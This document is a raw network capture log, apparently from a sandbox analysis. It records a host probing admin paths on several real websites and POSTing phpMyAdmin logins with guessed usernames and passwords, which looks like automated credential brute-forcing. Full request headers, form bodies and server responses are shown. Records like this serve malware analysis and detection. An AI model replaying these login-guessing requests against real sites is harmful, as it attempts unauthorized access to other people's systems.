2024-02-20 23:26:19 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_esApNy1sxJiYNajNn5ZQ4Xw7orCmyEwJjkEubuOhtZjjSSB09mI2H7Up0utrzIjB+BlExrxfnKn8dVYer7FNZw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:19 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
257	192.168.2.6	53435	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	208	OUT	GET /admin HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:19 GMT Connection: close
2024-02-20 23:26:19 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
258	192.168.2.6	53496	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	170	OUT	GET /admin.php HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	181	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/admin.php
2024-02-20 23:26:19 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
259	192.168.2.6	53544	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	398	OUT	POST /phpmyadmin/index.php?route=/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=8p850ha38al79pkuskhqkgapjl; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/phpmyadmin/ Content-Length: 148 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:19 UTC	148	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 36 65 37 61 37 37 33 33 32 31 35 37 37 35 32 64 34 38 35 32 34 34 33 65 37 38 32 32 33 30 36 62 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 38 70 38 35 30 68 61 33 38 61 6c 37 39 70 6b 75 73 6b 68 71 6b 67 61 70 6a 6c 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 61 64 6d 69 6e 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=6e7a77332157752d4852443e7822306b&set_session=8p850ha38al79pkuskhqkgapjl&pma_username=admin&pma_password=fortress%21&server=1
2024-02-20 23:26:19 UTC	1361	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:19 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: phpMyAdmin_https=okbr6ragu2q8l08tu7nl45ut0k; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpmyadmin/; secure last-modified: Tue, 20 Feb 2024 23:26:19 GMT
2024-02-20 23:26:19 UTC	443	IN	Data Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 35 4b 5a 34 6c 75 33 36 59 67 6c 6a 4f 47 34 36 4e 39 59 7a 47 68 73 36 6f 4f 6a 79 55 49 6f 5a 50 72 68 4f 76 6a 74 73 4a 6d 55 4d 44 72 37 25 32 42 72 31 70 69 58 6e 67 70 4a 35 52 4e 78 52 50 48 50 32 67 6a 31 70 38 51 49 75 72 61 7a 42 4c 66 4c 54 54 4e 38 33 52 63 4a 52 52 75 32 6f 64 49 71 6e 39 77 49 58 35 75 75 77 47 6c 4f 75 74 35 54 55 79 54 70 59 6f 64 6e 33 34 63 30 33 34 4d 46 67 75 46 68 6d 7a 59 31 76 53 78 34 67 25 33 44 25 33 44 22 Data Ascii: CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5KZ4lu36YgljOG46N9YzGhs6oOjyUIoZPrhOvjtsJmUMDr7%2Br1piXngpJ5RNxRPHP2gj1p8QIurazBLfLTTN83RcJRRu2odIqn9wIX5uuwGlOut5TUyTpYodn34c034MFguFhmzY1vSx4g%3D%3D"
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 34 39 32 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 492e<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6e Data Ascii: data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/n
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></script>
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 27 41 70 72 69 6c 27 2c 0a 20 20 20 20 27 4d 61 79 27 2c 0a 20 20 Data Ascii: .datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March', 'April', 'May',
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 30 32 30 74 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 27 2c 0a 20 Data Ascii: nd'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0020this\u0020field',
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 76 61 6c 69 64 61 74 Data Ascii: ('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), validat
2024-02-20 23:26:19 UTC	1369	IN	Data Raw: 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 64 6f 63 6c 69 6e 6b 73 Data Ascii: in.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js', 1) .add('doclinks

Session ID	Source IP	Source Port	Destination IP	Destination Port
260	192.168.2.6	53457	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	390	OUT	POST /phpMyAdmin/index.php?route=/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=a70qfc3g0vu9p754f85kck34n3; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://amsantechnology.com/phpMyAdmin/ Content-Length: 147 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:19 UTC	147	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 37 30 37 37 37 39 33 63 34 33 36 31 32 32 32 36 35 38 33 33 32 38 34 35 36 66 34 64 34 66 34 66 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 61 37 30 71 66 63 33 67 30 76 75 39 70 37 35 34 66 38 35 6b 63 6b 33 34 6e 33 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 72 6f 6f 74 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 65 64 65 34 64 65 6c 65 63 35 61 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=7077793c43612226583328456f4d4f4f&set_session=a70qfc3g0vu9p754f85kck34n3&pma_username=root&pma_password=ede4delec5a&server=1
2024-02-20 23:26:19 UTC	1379	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:19 GMT Server: Apache X-ob_mode: 1 X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow Expires: Tue, 20 Feb 2024 23:26:19 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: phpMyAdmin_https=9m4jsc3j2ousvfbn6h48gk7hpt; path=/phpMyAdmin/; secure; HttpOnly; SameSite=Strict Set-Cookie: pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpMyAdmin/; secure Last-Modified: Tue, 20 Feb 2024 23:26:19 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
2024-02-20 23:26:19 UTC	6813	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 2000<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:19 UTC	1385	IN	Data Raw: 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 Data Ascii: regional[''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0
2024-02-20 23:26:19 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:20 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 